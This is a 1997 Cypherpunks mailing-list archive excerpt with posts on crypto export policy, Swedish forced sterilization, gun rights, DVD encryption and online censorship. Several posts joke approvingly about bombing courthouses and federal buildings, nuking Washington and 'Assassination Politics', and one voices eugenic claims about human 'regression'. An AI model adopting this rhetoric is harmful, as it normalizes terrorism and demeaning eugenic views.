Xenix Chainsaw Massacre" http://bureau42.base.org/public/xenix "WebWorld & the Mythical Circle of Eunuchs" http://bureau42.base.org/public/webworld From remailer at bureau42.ml.org Thu Aug 28 06:56:15 1997 From: remailer at bureau42.ml.org (bureau42 Anonymous Remailer) Date: Thu, 28 Aug 1997 21:56:15 +0800 Subject: Tim coins another phrase? / Re: Suing gun makers? Message-ID: Tim May wrote: > If they won, then the courthouse in which this happened should be McVeighed. Kind of has a 'ring' to it...or is that a 'boom?' From declan at pathfinder.com Thu Aug 28 07:17:59 1997 From: declan at pathfinder.com (Declan McCullagh) Date: Thu, 28 Aug 1997 22:17:59 +0800 Subject: hello In-Reply-To: <340466A5.5BFB@geocities.com> Message-ID: Alexis, I'd be glad to help you in your quest to learn more about cryptomography. You can start by reading every article I've written on cryptomography; you can find those in the http://www.hotwired.com/netizen/ and http://netlynews.com/ and http://www.time.com/ archives. I no longer phrank, so I'm afraid I can't be of much help to you there. -Declan On Wed, 27 Aug 1997, Alexis wrote: > Is there anybody that can tutor me how to hack, crack, phrank, and > cryptomography ( i'm not sure i speel that last part correctly. > I would like to get some help, please email me back ASAP thank you so > very much > > recall. > > From declan at pathfinder.com Thu Aug 28 07:27:30 1997 From: declan at pathfinder.com (Declan McCullagh) Date: Thu, 28 Aug 1997 22:27:30 +0800 Subject: Stewart Baker on Bernstein encryption decision (fwd) In-Reply-To: <3.0.32.19970827181010.00a72d74@cnw.com> Message-ID: I share part of the blame here; I forwarded Baker's message to cypherpunks. I should point out that Baker is an interesting fellow. Check out his article on Japan's crypto export ctrls in last Oct? Wired. He currently represents Netscape; he's one of two lawyers in DC who does. -Declan On Wed, 27 Aug 1997, Blanc wrote: > V.Z.Nuri wrote, in reaction to Stewar Baker's message: > > >*spit* [...] fraudulent camel's back. soon let the whole corrupt > >structure fall like the rotten house of cards that it is. > [...] > >SOME PEOPLE JUST DON'T GET IT, even as they > >wallow daily in their own hypocrisy. > > > >[...]the horrid and repulsive episode [...] > >when in the course of human events it become necessary to expunge a > >parasite... > [...] > >(if so, it would be the one of the least vile and sleazy tactics employed > >so far in the whole sorry affair.) > > > >[...] sarcastic contempt I feel for you and your despicable cohorts [...] > .......................................... > > > Like, have you tried to export software lately, L.D.? You're taking this > rather personally. > > Your heart-felt, warm&fuzzy message to Mr. Baker, who doesn't know you > from anyone (except that you posted from that scum-bag pot of > cypherpunk-infestation (those poisonous tentacles of Medusa), I'm sure will > instill in him a deep regret for his past attitude; he'll probably recant > his past, become a born-again Christian, and join the list. > > Eloquent, informative statements from other noteworthy representatives of > the technology industry, spoken even at meetings where Mr. Baker was > personally present, and even directly to him by the likes of TCM, could > not, I'm sure be as persuasive as the *spit*ting and lowly modifying terms > which you slew in his direction. > > An intellectually uplifting debate on the subject, bringing into view > incontestable points of fact, could not surely be as convincing as this > upchuck of verbiage from deep within yourself, where you keep your stash of > special words selected for their ability to clarify difficult issues. > > Goodness, next you'll be agreeing with TCM that "they should all be nuked". > You might even begin consider a special venue for achieving this, such > as.........Blacknet? > > > > .. > Blanc > > From tm at dev.null Thu Aug 28 07:30:15 1997 From: tm at dev.null (TruthMonger) Date: Thu, 28 Aug 1997 22:30:15 +0800 Subject: The World's Fastest Crypto Teacher Message-ID: <34058837.6158@dev.null> Alexis wrote: > Is there anybody that can tutor me how to hack, crack, phrank, and > cryptomography ( i'm not sure i speel that last part correctly. > I would like to get some help, please email me back ASAP thank you so > very much Alexis, I would be happy to teach you everything I know about cryptography. ...uuhhh... There, that didn't take long. Any questions? TruthMonger From remailer at bureau42.ml.org Thu Aug 28 08:20:02 1997 From: remailer at bureau42.ml.org (bureau42 Anonymous Remailer) Date: Thu, 28 Aug 1997 23:20:02 +0800 Subject: Sweden's Social Democrats Sterilize the Inferior Message-ID: <5sNgMzrdPd+sy1QEM7ySTg==@bureau42.ml.org> Declan McCullagh wrote: > >From: David Boaz > >Subject: Social Democrats Sterilize the Inferior > >By JIM HEINTZ > >.c The Associated Press > >The program stemmed from the pursuit of eugenics, a once-popular movement to > >improve humanity by controlling genetic factors in reproduction. AB wrote: >The problem is that from a purely scientific evolutionary point of >view, the human race is surely regressing, the masses of negative >evolutionary pressures are certainly pushing this way. > >The sterilizations targeted a wide range of people: those of mixed race; > >unmarried mothers with several children; people judged to be habitual > >criminals; even a boy considered ''sexually precocious.'' > >''Grounds for recommending sterilization: unmistakable Gypsy features, > >psychopathy, vagabond life,'' reads one document cited by Dagens Nyheter. AB wrote: >Welfare cases in the UK are encouraged to have children by the way the >system is structured. A single mother is the highest priority case, >with pretty much guaranteed 16 years of preferential treatment, higher >payouts, higher on housing priority lists, and so on. Female >divorcees with children often get more money, better accomodation, and >more extra fringe benefit handouts than they would ever have married. >Welfare is better than the minimum wage earners lot by a significant >amount. It seems to me that today's society, like Nazi society, is heavily involved in influencing the evolutionary direction of "humanity by controlling genetic factors in reproduction." However, as Adam points out, society currently weights it's eugenics program in favor of those whose survival and/or level of subsistence is based on the incomes earned by other people who are more fitted for survival. > >The issue of forced sterilization stands to be even more troublesome, because > >it was conducted under the ostensibly benign gaze of the Social Democrats - > >that party that built Sweden's welfare state and proclaimed it a paragon of > >enlightened government. And today we have a forced child-bearing program based on rewarding those who bear children with survival support that they would not otherwise receive. Even when the individual has a desire to change their position in life, they usually get little support for that. Instead, we make it much easier to just pop a little-one in the oven and say goodbye to all of your survival woes. > >Not only did eugenics foresee an improved human race, it also was appealing > >to Social Democrats, who were beginning to see that Sweden's welfare state > >would be costly and wanted to limit the number of people who would have to be > >supported, the newspaper said. AB wrote: >The problem is what can you do about it? Well I guess you could >negatively structure the welfare hand out system to discourage them. >You could scrap the welfare system. They already offer free birth >control advice to teenagers and hand out condoms free without >questions etc. Free abortions? The problems are *known* problems which remain unsolved--the question is, "Why?". AB wrote: >The real problem is that the pervasive bleeding heart >socialist/communist welfare system mentality will ensure that you'll >never manage it. That, indeed, is half of the problem. The other side of the coin is that the capitalist/fascist earned income and/or welfare system is now just as dependent on maintaining the status-quo. As is the law enforcement/judicial/prison system of justice. It used to be the occasional war which sustained a robust economy. Now it is a 'constant' war which helps to sustain the economy. The War on Drugs. How many people in this country owe their jobs to drug addicts. A damn large number, but do drug addicts get any thanks for boosting employment (and TV's)? >"The children" is a war cry which will ensure the continuance of state >funded negative evolutionary pressures. Praise the Lord! I think much of the country is beginning to realize that we are now in a Catch-22 situation where "solving" societies problems will "cause" a great many problems in itself. Solve the drug problem tomorrow, and we will have doctors, lawyers, policemen and social workers out begging in the streets to feed their families. Solve the welfare problem tomorrow, and we will have riots in the streets by those on 'both' sides of the issue, no matter what the nature of the changes. {e.g. - I can give everyone on welfare, in the whole world, a good paying job in Inuvik, starting tomorrow. So now we can begin the violent, bloody debate on "forced relocation."} --------- >From http://www.hill.se/mag.htm (Re: Swedish Sterilization) Blackmail and threats: The Medical Board approved of the operation. Since physical force was prohibitied, the school management and the doctor used blackmail to make Astrid consent to sterilization. If she did not approve of this little operation, they threatened her, she would face life incarceration. Thousands of healthy, intelligent persons were submitted to the same treatment as Astrid was. The medical arguments were, however, a little different according to what sex the individuals belonged to. Boys ready for sterilization were rather described as unreliable, dishonest and mischievous. (irreverent cypherpunks!) There has not been a real settlement with the period of sterilization. The National Institute of Racialiology was never discontinued, but had its name changed into The Institution of Medical Geneticsnd was assimilated into Uppsala University in 1959. --------- I already knew a lot about the history of the eugenics movement, as well as its 'shift' to new organizations with the same old faces, and the same underlying ethics and rational behind them. I didn't learn about this on the ABC TV News, nor in Time Magazine, nor any of the 'mainstream' media. I learned about this on the types of websites which gave me information on the reptilian Nazi aliens from outer space, who live in underground bunkers throughout the world. This is also where I learned about Planned Parenthood and its successors being an offshoot of the Eugenics/Purification movement. And about the U.S.'s rich and politically elite of today owe much of their family's money to working closer with Hitler than any of the Death Camp guards. And about the U.S. gun laws being based on the Nazi gun laws of Hitler's era. To tell the truth, I have absolutely no interest in becoming a raving lunatic who believes in reptilian Nazi's from outer space living in underground bunkers beneath my home town, but the problem is that the rest of the information I am getting on the 'lunatic' sites is proving much more reliable than the information I received in my years of education within the public school system. The problem with lunatic sites is that too many of them are not afraid to supply facts and references from established, reliable sources, including government documents, while the corresponding government-backed versions of events involve "magic bullet"'s and John Does who appear and disappear like the Cheshire cat, at the government's convenience. The problem with mainstream news sites is when a story surfaces which lends credence to the wild-eyed claims of the 'lunatic' news sites, the story suddenly disappears, to be replaced with a story of a fireman saving a cute kitten from a tree. The problem with reading both the mainstream ~and~ the lunatic news sites is that a very disturbing picture develops. Portions of the 'free world' imprison more people than dictatorships, but for the "right" reasons, instead of the "wrong" reasons. Human-rights-defending liberals have sterilized many, many times the number of people that genetic-purification-monster Nazi's ever dreamed of, but for the "right" reasons, instead of the "wrong" reasons. Every evil that has ever been done under the sun (or the moon, for that matter) is still being done, but under the "right" name, using the "right" terminology, and for the "right" reasons. (The chief justification always seems to lie in a variation of 'renaming' the 4 Horsemen of the Apocalypse.) "Assassination Politics" is beginning to sound more and more like a valid electoral system. One dollar, one vote. Perhaps Jim Bell and Tim May can corroborate on a sequel, "Nuclear Assassination Politics." LonesomeOneryAndMeanMonger From nobody at REPLAY.COM Thu Aug 28 08:32:29 1997 From: nobody at REPLAY.COM (Anonymous) Date: Thu, 28 Aug 1997 23:32:29 +0800 Subject: U.S. Refugees Flee to Germany Message-ID: <199708281520.RAA25882@basement.replay.com> ~From: http://www.guidemag.com/newsslant/vigilante-censors.html ~"Whether it's CPAC wanting to nuke all web sites containing the word 'boy,' Senator Swinestein wanting to nuke all web sites containing the word 'bomb,' or Senator Hatch wanting to nuke all web sites containing the word 'sex,'" writes Mike Duvos in a Cypherpunks newsgroup, "the optimal strategy for service providers has turned out to be to quietly remove any material some squeaky wheel is uncomfortable with, keep proclaiming themselves to be the strongest supporters of free speech in the entire Net community, and stonewall when asked questions which might suggest anything to the contrary." Sounds like one of them-thar, cynical, irreverent, shit-disturbing CypherPunks, to me. ~Now, the pages are back online on a small server in Germany. Organizers of the site are raising funds to purchase their own direct connection to the Net. However they don't want their computer to be in the US-- but not because they plan to violate any US laws. "We are very nervous about being here," says Jim Finn, who helps run the Free Spirits, "if the government is going to use underhanded tactics to intimidate our providers and possibly confiscate our equipment." In the course of investigations, police frequently seize computers that they never return, even when they file no charges. Perhaps Germany should start building refugee camps for American homosexuals, Jews, and producers of strong encryption. ~If the Internet had sprung up in the 50s, Senator Jesse Helms would be riling his white constituents about the scandalous web sites promoting interracial marriage and civil rights. The right way to answer to Helms and his ilk is not with pacifying assurances that, thanks to filtering, people can avoid these offensive ideas, but to confront the underlying racism. Now that queer sex is the bugaboo, the answer shouldn't be any different. CypherPunk Cult of One Project:?: Put up a website containing quotes from Jesse Helms and other high- profile politicians, public figures, etc., and then actively promote it being censored and removed from the InterNet. (Pictures of a topless Princess Di, etc. Naked children from a "Life" magazine photo from the '60's, etc.) Has anyone ever sued themselves to have their own site censored and dismembered? "Greg Broiles vs. Greg Broiles" (Kind of has a 'ring' to it.) ~That censorship is bad and dangerous no matter who its victims is a concept best grasped today by Cypherpunks steeped in computers and the Net. And who came out of internment in the legendary "Flame Camps" of the late 1990's, vowing, "Never Forgive. No Prisoners." ~Whether it's the painting "Mona Lisa" or the sex video Lisa Moaning, WHY DON'T THESE PEOPLE PROVIDE *POINTERS*!!! (No, *not* to the "Mona Lisa," you idiot!) ~If hysteria over drugs or hate speech or pornography becomes intense enough, then no one's data-- which is to say no one's privacy-- is safe. Much better than civil libertarians and gay politicos, Internet activists have seen the danger in the new wave of repressive laws. Whether they can articulate that danger to a broader public remains to be seen. If not, the 1990s may be recalled as a short-lived golden age of free expression on the Net, and free spirits won't have any place to call home. ** "Give me bandwidth, or give me death." "Give me your huddled electrons, struggling to be free." "Now is the time for all good hackers to come to the aide of no-country. "One if by land. Two if by sea. NULL if by Net." ("The Americans are coming! The Americans are coming!) "I may not agree with what you censor, but I will defend to the death my right to tell you to 'Fuck off and die.'" "Ask not what you can do for your country. Ask where the Federal building is." "A small step for a nuclear bomb. A big step for D.C." ("It's raining donkeys and elephants out there. Better take your lead umbrella.") "In Diffie-Hellman We Trust." "Nuke the candidate of your choice--but Nuke!" "The final finding of the TruthMonger Commission is that Tim May acted alone. The Magic Nuclear Missle hit D.C., deflected toward Moscow, turned around in mid-air and took out London, before coming to rest at Rome. "There is no evidence to suggest that Jim Bell was ever a member of the CypherPunks list, or ever had contact of any nature with Tim May. Toad.com was never connected to the CypherPunks list--it served mostly as a mail-drop for decent, upstanding drug dealers, pedophiles, tax evaders and terrorists. "Duncan Frissel's first act of power, the pardoning of Tim May, was done in order to allow the nation to put this behind us and to heal our nuclear wounds." CONSTITUTION OF THE UNITED ISP'S OF TERRA ----------------------------------------- "Congress shall make no laws." Signature: Anonymous Witness: Nobody --------- ------ Send complaints of abuse of this Constitution to: Lock&Load at nuke.dc ~~~~~~~~~~~~~ FreedomMonger ~~~~~~~~~~~~~ From JonWienk at ix.netcom.com Thu Aug 28 08:49:08 1997 From: JonWienk at ix.netcom.com (Jonathan Wienke) Date: Thu, 28 Aug 1997 23:49:08 +0800 Subject: Socio-Economic Cults (Re: Cypherpunk Cults) In-Reply-To: Message-ID: <3.0.3.32.19970828083746.006fdd88@popd.netcruiser> >>> If one person becomes too much of a nuisance (real trigger happy >for >>> ultra minor infractions [...] relatives, friends, or concerned >citizens >>> will correct (fill trigger happy person with lead). >> >>Dosn't help the poor person who got shot dose it? Am I mad to >beleave >>that getting killed is a reduction of basic civil liberties? >> >>> That's how the wild west worked anyway... outlaws didn't last that >>> long. >> >>Nor did the wild west. >> > >And nor the innconent bystanders. The 'you pissed me off - bang bang >you're dead' mentality was the reason for one of the largest >genocides in human history. Excuse me, but if you are referring to the Old West, you are seriously misinformed. While there certainly was violent crime, the murder rate (excluding self-defense, deaths from wars, etc.) was actually lower than it is today. I came across a doctoral thesis written several years ago that did a statistical analysis of population data and newspaper obituaries in cities like Tombstone from around 1850-1890. The conclusion of the paper was that while the drinking/gambling/red light districts were certainly violent places, in general, there was less crime than there is today. The life of criminals is hard when everyone is armed, and when the justice system actually executes convicted murderers in a timely fashion. (Capital punishment is the only treatment for criminals that has a 0% recidivism rate.) Of course, the primary flaw in your logic is that you assume anyone who wants to own a gun is deranged or unbalanced somehow, and that gun ownership causes crime. There are at least 200 million (registered) guns in the USA, (no reliable figures are available for the quantity of illegally imported, homemade, and otherwise unregistered weapons) and at least half of the households in the USA have at least one gun. Miraculously enough, most people are not murderers or violent criminals, and even the rate of accidental firearm death/injury has steadily declined despite increases in the rate of gun ownership. I had a gun in my pocket when my wife told me she was having an affair with one of her co-workers, and yet 18 months later, both she and the "other man" are both alive and healthy--no bullet holes. I have not even threatened to misuse firearms in such a manner, since that accomplishes nothing more than exchanging one set of problems for a new, and more annoying set. (Being cheated on sucks, but I am sure that being anal-rammed by a bunch of HIV+ fat guys in prison sucks even worse.) Amazingly enough, most people in America have more in common with me than Colin Ferguson. (He's the guy who did the Long Island commuter train murders.) It really isn't that hard to figure out that shooting a guy breaking through your bedroom window at 3 AM with a crowbar and a TEC-9 is a Good Thing, (at least if you value your continued existence, and that of your family) while shooting someone giving you the finger on the way in to work is a Bad Thing. In the second case, there is no threat to your life involved, so there is no reason to kill anyone. In the first case, there is. Is this brain surgery? Jonathan Wienke What part of "the right of the people to keep and bear Arms, shall not be infringed" is too hard to understand? (From 2nd Amendment, U.S. Constitution) When everyone is armed, criminals fear everyone, not just the police. PGP 2.6.2 RSA Key Fingerprint: 7484 2FB7 7588 ACD1 3A8F 778A 7407 2928 DSS/D-H Key Fingerprint: 3312 6597 8258 9A9E D9FA 4878 C245 D245 EAA7 0DCC Public keys available at pgpkeys.mit.edu. PGP encrypted e-mail preferred. US/Canadian Windows 95/NT or Mac users: Get Eudora Light + PGP 5.0 for free at http://www.eudora.com/eudoralight/ Get PGP 5.0 for free at http://bs.mit.edu:8001/pgp-form.html Commercial version of PGP 5.0 and related products at http://www.pgp.com Eudora Light + PGP = Free, Convenient Communication Privacy -------------- next part -------------- A non-text attachment was scrubbed... Name: pgp00006.pgp Type: application/octet-stream Size: 237 bytes Desc: "PGP signature" URL: From JonWienk at ix.netcom.com Thu Aug 28 09:00:44 1997 From: JonWienk at ix.netcom.com (Jonathan Wienke) Date: Fri, 29 Aug 1997 00:00:44 +0800 Subject: Cypherpunk Fwd Message-ID: <3.0.3.32.19970828084616.00701e60@popd.netcruiser> Date: Thu, 28 Aug 1997 17:20:36 +0200 (MET DST) Subject: U.S. Refugees Flee to Germany To: cypherpunks at toad.com From: nobody at replay.com (Anonymous) Organization: Replay and Company UnLimited X-001: Replay may or may not approve of the content of this posting X-002: Report misuse of this automated service to X-URL: http://www.replay.com/remailer/ Sender: owner-cypherpunks at cyberpass.net Reply-To: nobody at replay.com (Anonymous) X-Loop: cypherpunks at cyberpass.net ~From: http://www.guidemag.com/newsslant/vigilante-censors.html ~"Whether it's CPAC wanting to nuke all web sites containing the word 'boy,' Senator Swinestein wanting to nuke all web sites containing the word 'bomb,' or Senator Hatch wanting to nuke all web sites containing the word 'sex,'" writes Mike Duvos in a Cypherpunks newsgroup, "the optimal strategy for service providers has turned out to be to quietly remove any material some squeaky wheel is uncomfortable with, keep proclaiming themselves to be the strongest supporters of free speech in the entire Net community, and stonewall when asked questions which might suggest anything to the contrary." Sounds like one of them-thar, cynical, irreverent, shit-disturbing CypherPunks, to me. ~Now, the pages are back online on a small server in Germany. Organizers of the site are raising funds to purchase their own direct connection to the Net. However they don't want their computer to be in the US-- but not because they plan to violate any US laws. "We are very nervous about being here," says Jim Finn, who helps run the Free Spirits, "if the government is going to use underhanded tactics to intimidate our providers and possibly confiscate our equipment." In the course of investigations, police frequently seize computers that they never return, even when they file no charges. Perhaps Germany should start building refugee camps for American homosexuals, Jews, and producers of strong encryption. ~If the Internet had sprung up in the 50s, Senator Jesse Helms would be riling his white constituents about the scandalous web sites promoting interracial marriage and civil rights. The right way to answer to Helms and his ilk is not with pacifying assurances that, thanks to filtering, people can avoid these offensive ideas, but to confront the underlying racism. Now that queer sex is the bugaboo, the answer shouldn't be any different. CypherPunk Cult of One Project:?: Put up a website containing quotes from Jesse Helms and other high- profile politicians, public figures, etc., and then actively promote it being censored and removed from the InterNet. (Pictures of a topless Princess Di, etc. Naked children from a "Life" magazine photo from the '60's, etc.) Has anyone ever sued themselves to have their own site censored and dismembered? "Greg Broiles vs. Greg Broiles" (Kind of has a 'ring' to it.) ~That censorship is bad and dangerous no matter who its victims is a concept best grasped today by Cypherpunks steeped in computers and the Net. And who came out of internment in the legendary "Flame Camps" of the late 1990's, vowing, "Never Forgive. No Prisoners." ~Whether it's the painting "Mona Lisa" or the sex video Lisa Moaning, WHY DON'T THESE PEOPLE PROVIDE *POINTERS*!!! (No, *not* to the "Mona Lisa," you idiot!) ~If hysteria over drugs or hate speech or pornography becomes intense enough, then no one's data-- which is to say no one's privacy-- is safe. Much better than civil libertarians and gay politicos, Internet activists have seen the danger in the new wave of repressive laws. Whether they can articulate that danger to a broader public remains to be seen. If not, the 1990s may be recalled as a short-lived golden age of free expression on the Net, and free spirits won't have any place to call home. ** "Give me bandwidth, or give me death." "Give me your huddled electrons, struggling to be free." "Now is the time for all good hackers to come to the aide of no-country. "One if by land. Two if by sea. NULL if by Net." ("The Americans are coming! The Americans are coming!) "I may not agree with what you censor, but I will defend to the death my right to tell you to 'Fuck off and die.'" "Ask not what you can do for your country. Ask where the Federal building is." "A small step for a nuclear bomb. A big step for D.C." ("It's raining donkeys and elephants out there. Better take your lead umbrella.") "In Diffie-Hellman We Trust." "Nuke the candidate of your choice--but Nuke!" "The final finding of the TruthMonger Commission is that Tim May acted alone. The Magic Nuclear Missle hit D.C., deflected toward Moscow, turned around in mid-air and took out London, before coming to rest at Rome. "There is no evidence to suggest that Jim Bell was ever a member of the CypherPunks list, or ever had contact of any nature with Tim May. Toad.com was never connected to the CypherPunks list--it served mostly as a mail-drop for decent, upstanding drug dealers, pedophiles, tax evaders and terrorists. "Duncan Frissel's first act of power, the pardoning of Tim May, was done in order to allow the nation to put this behind us and to heal our nuclear wounds." CONSTITUTION OF THE UNITED ISP'S OF TERRA ----------------------------------------- "Congress shall make no laws." Signature: Anonymous Witness: Nobody --------- ------ Send complaints of abuse of this Constitution to: Lock&Load at nuke.dc ~~~~~~~~~~~~~ FreedomMonger ~~~~~~~~~~~~~ Jonathan Wienke What part of "the right of the people to keep and bear Arms, shall not be infringed" is too hard to understand? (From 2nd Amendment, U.S. Constitution) When everyone is armed, criminals fear everyone, not just the police. PGP 2.6.2 RSA Key Fingerprint: 7484 2FB7 7588 ACD1 3A8F 778A 7407 2928 DSS/D-H Key Fingerprint: 3312 6597 8258 9A9E D9FA 4878 C245 D245 EAA7 0DCC Public keys available at pgpkeys.mit.edu. PGP encrypted e-mail preferred. US/Canadian Windows 95/NT or Mac users: Get Eudora Light + PGP 5.0 for free at http://www.eudora.com/eudoralight/ Get PGP 5.0 for free at http://bs.mit.edu:8001/pgp-form.html Commercial version of PGP 5.0 and related products at http://www.pgp.com Eudora Light + PGP = Free, Convenient Communication Privacy From anon at anon.efga.org Thu Aug 28 09:18:52 1997 From: anon at anon.efga.org (Anonymous) Date: Fri, 29 Aug 1997 00:18:52 +0800 Subject: U.S. Refugees Flee to Germany Message-ID: <1d70496b0f3a429b06c95ae90b13a172@anon.efga.org> ~From: http://www.guidemag.com/newsslant/vigilante-censors.html ~"Whether it's CPAC wanting to nuke all web sites containing the word 'boy,' Senator Swinestein wanting to nuke all web sites containing the word 'bomb,' or Senator Hatch wanting to nuke all web sites containing the word 'sex,'" writes Mike Duvos in a Cypherpunks newsgroup, "the optimal strategy for service providers has turned out to be to quietly remove any material some squeaky wheel is uncomfortable with, keep proclaiming themselves to be the strongest supporters of free speech in the entire Net community, and stonewall when asked questions which might suggest anything to the contrary." Sounds like one of them-thar, cynical, irreverent, shit-disturbing CypherPunks, to me. ~Now, the pages are back online on a small server in Germany. Organizers of the site are raising funds to purchase their own direct connection to the Net. However they don't want their computer to be in the US-- but not because they plan to violate any US laws. "We are very nervous about being here," says Jim Finn, who helps run the Free Spirits, "if the government is going to use underhanded tactics to intimidate our providers and possibly confiscate our equipment." In the course of investigations, police frequently seize computers that they never return, even when they file no charges. Perhaps Germany should start building refugee camps for American homosexuals, Jews, and producers of strong encryption. ~If the Internet had sprung up in the 50s, Senator Jesse Helms would be riling his white constituents about the scandalous web sites promoting interracial marriage and civil rights. The right way to answer to Helms and his ilk is not with pacifying assurances that, thanks to filtering, people can avoid these offensive ideas, but to confront the underlying racism. Now that queer sex is the bugaboo, the answer shouldn't be any different. CypherPunk Cult of One Project:?: Put up a website containing quotes from Jesse Helms and other high- profile politicians, public figures, etc., and then actively promote it being censored and removed from the InterNet. (Pictures of a topless Princess Di, etc. Naked children from a "Life" magazine photo from the '60's, etc.) Has anyone ever sued themselves to have their own site censored and dismembered? "Greg Broiles vs. Greg Broiles" (Kind of has a 'ring' to it.) ~That censorship is bad and dangerous no matter who its victims is a concept best grasped today by Cypherpunks steeped in computers and the Net. And who came out of internment in the legendary "Flame Camps" of the late 1990's, vowing, "Never Forgive. No Prisoners." ~Whether it's the painting "Mona Lisa" or the sex video Lisa Moaning, WHY DON'T THESE PEOPLE PROVIDE *POINTERS*!!! (No, *not* to the "Mona Lisa," you idiot!) ~If hysteria over drugs or hate speech or pornography becomes intense enough, then no one's data-- which is to say no one's privacy-- is safe. Much better than civil libertarians and gay politicos, Internet activists have seen the danger in the new wave of repressive laws. Whether they can articulate that danger to a broader public remains to be seen. If not, the 1990s may be recalled as a short-lived golden age of free expression on the Net, and free spirits won't have any place to call home. ** "Give me bandwidth, or give me death." "Give me your huddled electrons, struggling to be free." "Now is the time for all good hackers to come to the aide of no-country. "One if by land. Two if by sea. NULL if by Net." ("The Americans are coming! The Americans are coming!) "I may not agree with what you censor, but I will defend to the death my right to tell you to 'Fuck off and die.'" "Ask not what you can do for your country. Ask where the Federal building is." "A small step for a nuclear bomb. A big step for D.C." ("It's raining donkeys and elephants out there. Better take your lead umbrella.") "In Diffie-Hellman We Trust." "Nuke the candidate of your choice--but Nuke!" "The final finding of the TruthMonger Commission is that Tim May acted alone. The Magic Nuclear Missle hit D.C., deflected toward Moscow, turned around in mid-air and took out London, before coming to rest at Rome. "There is no evidence to suggest that Jim Bell was ever a member of the CypherPunks list, or ever had contact of any nature with Tim May. Toad.com was never connected to the CypherPunks list--it served mostly as a mail-drop for decent, upstanding drug dealers, pedophiles, tax evaders and terrorists. "Duncan Frissel's first act of power, the pardoning of Tim May, was done in order to allow the nation to put this behind us and to heal our nuclear wounds." CONSTITUTION OF THE UNITED ISP'S OF TERRA ----------------------------------------- "Congress shall make no laws." Signature: Anonymous Witness: Nobody --------- ------ Send complaints of abuse of this Constitution to: Lock&Load at nuke.dc ~~~~~~~~~~~~~ FreedomMonger ~~~~~~~~~~~~~ From kent at songbird.com Thu Aug 28 09:24:52 1997 From: kent at songbird.com (Kent Crispin) Date: Fri, 29 Aug 1997 00:24:52 +0800 Subject: Socio-Economic Cults (Re: Cypherpunk Cults) In-Reply-To: Message-ID: <19970828091808.35630@bywater.songbird.com> On Thu, Aug 28, 1997 at 08:37:46AM -0700, Jonathan Wienke wrote: > > > >And nor the innconent bystanders. The 'you pissed me off - bang bang > >you're dead' mentality was the reason for one of the largest > >genocides in human history. > > Excuse me, but if you are referring to the Old West, you are seriously > misinformed. I believe he was referring to native americans. > While there certainly was violent crime, the murder rate > (excluding self-defense, deaths from wars, etc.) was actually lower than it > is today. I came across a doctoral thesis written several years ago that > did a statistical analysis of population data and newspaper obituaries in > cities like Tombstone from around 1850-1890. The conclusion of the paper > was that while the drinking/gambling/red light districts were certainly > violent places, in general, there was less crime than there is today. The > life of criminals is hard when everyone is armed, and when the justice > system actually executes convicted murderers in a timely fashion. (Capital > punishment is the only treatment for criminals that has a 0% recidivism rate.) 1. There are lots of doctoral theses that are seriously flawed. Off the top, you mention that "self-defense" was excluded. That begs the question -- you now have to define self-defense. 2. Of course the "old west", as usually portrayed, is largely a myth. 3. Raw crime rates are not that useful -- go to Iran or Iraq. 4. The fact remains that settlers established governments and laws, and did *not* leave enforcement to the individual. > Of course, the primary flaw in your logic is that you assume anyone who > wants to own a gun is deranged or unbalanced somehow, and that gun > ownership causes crime. Oh piffle. No such assumption was stated. You are erecting a strawman so you can stand on a soapbox and shoot it full of holes. -- Kent Crispin "No reason to get excited", kent at songbird.com the thief he kindly spoke... PGP fingerprint: B1 8B 72 ED 55 21 5E 44 61 F4 58 0F 72 10 65 55 http://songbird.com/kent/pgp_key.html From mixmaster at as-node.jena.thur.de Thu Aug 28 09:34:03 1997 From: mixmaster at as-node.jena.thur.de (Jenaer Mixmaster Anonserver) Date: Fri, 29 Aug 1997 00:34:03 +0800 Subject: need confirmation of DVD/CSS crack in China ... Message-ID: Ernest Hua (hua at chromatic.com) wrote: >> Third, the entertainment industry giants will have to improve and agree on >> an encryption technology. The current 40-bit encryption standard used on >DVD >> discs, which is supposed to stop copyright pirates, has already been >cracked >> in China. Stronger encryption, however, forces PCs and players to run at a >> crawl. Partially as a result, Fox, Paramount, and Disney have not >committed >> to producing materials on DVD, Burdon noted. DVD encryption is described on the Web at: http://www.kipinet.com/tdb/tdb_oct96/feat_protection.html There's a very simple way to 'break' it - you just copy the entire disk. Key-size is irrelevant. As the article itself says: "While copy protection for DVD is often mistakenly referred to as "anti-piracy," it does not in fact provide much of a deterrent to those who would produce illegal discs on a mass scale." Or in other words, it will do nothing to stop the Chinese, it's simply intended to prevent you and me from copying disks and giving them to our friends. This is, of course, inevitable from the nature of the technology. As has been discussed many times in the past, this kind of scheme just can't work. Since that article is a few months old and talks about the big movie company's desire for a mandatory standard and laws against the sale of any machine which allows access to unencrypted data, I'd guess that this new article is FUD to persuade Congress to pass the laws. (Now explain to me why I'd want to buy yet another video format which can't even record?) CopyMonger From vipul at pobox.com Thu Aug 28 09:44:48 1997 From: vipul at pobox.com (Vipul Ved Prakash) Date: Fri, 29 Aug 1997 00:44:48 +0800 Subject: New service allows customers to track stolen PCs (fwd) Message-ID: <199708282151.VAA00958@fountainhead.net> *** New service allows customers to track stolen PCs Absolute Software announced Wednesday the CompuTrace Online Monitoring Service, a new service that provides CompuTrace customers with various PC monitoring reports via a private, secured Internet website. Customers will now have access to the whereabouts of their PCs via the Online Monitoring Service from any location at any time. CompuTrace's technology silently calls in to the CompuTrace Monitoring Center on a regular basis. The activity is reported to customers on a regular basis, or via the new CompuTrace Online Monitoring Service. (PR Newswire) For the full text story, see http://www.infobeat.com/stories/cgi/story.cgi?id=4650167-e2a -- Vipul Ved Prakash | - Electronic Security & Crypto vipul at pobox.com | - Web Objects 91 11 2233328 | - PERL Development 198 Madhuban IP Extension | - Linux & Open Systems Delhi, INDIA 110 092 | - Networked Virtual Spaces From tcmay at got.net Thu Aug 28 09:54:50 1997 From: tcmay at got.net (Tim May) Date: Fri, 29 Aug 1997 00:54:50 +0800 Subject: U.S. Refugees Flee to Germany In-Reply-To: <199708281520.RAA25882@basement.replay.com> Message-ID: At 8:20 AM -0700 8/28/97, Anonymous wrote: >~Now, the pages are back online on a small server in Germany. Organizers >of the site are raising funds to purchase their own direct connection to >the Net. However they don't want their computer to be in the US-- but >not because they plan to violate any US laws. "We are very nervous >about being here," says Jim Finn, who helps run the Free Spirits, "if >the government is going to use underhanded tactics to intimidate our >providers and possibly confiscate our equipment." In the course of >investigations, police frequently seize computers that they never >return, even when they file no charges. > > Perhaps Germany should start building refugee camps for American >homosexuals, Jews, and producers of strong encryption. ... I assume this is a joke, as Germany is one of the last places one would choose for a censorship-free site! (Pace the usual points about Neo-Nazi material being banned in Germany, the 